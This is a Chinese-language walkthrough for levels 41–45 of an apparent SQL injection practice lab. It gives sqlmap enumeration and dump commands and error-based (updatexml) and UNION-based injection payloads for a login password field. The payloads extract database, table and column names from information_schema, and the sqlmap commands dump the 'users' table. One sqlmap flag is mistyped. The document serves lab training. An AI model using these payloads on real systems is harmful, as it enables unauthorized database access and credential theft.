第41关
这关我们使用工具sqlmap练习一下(这里如果用本机的回环地址访问靶场的话只能在你的本机访问,因为我们是在虚拟机上进行扫描,所以不能使用127.0.0.1访问)
进入虚拟机kali,打开终端
查库
sqlmap -u 网址 -- current-db
查表
-D 库名 --tables
查数据
-D security -T users --dump
第42关
进入后登录页面然后在密码框进行注入
查数据库
'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa
查表名
'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa
查列
'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) -- aaa
第43关
还是在登录页面的密码框注入
查数据库
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa
查表
') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa
查列
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa
第44关
这关也是在登录页面的密码框里进行输入
查库
1' union select 1,database(),3 #
查表
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
查列
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
第45关
登录页面密码框里进行输入
查库
1') union select 1,database(),3 #
查表
1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
查列
1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #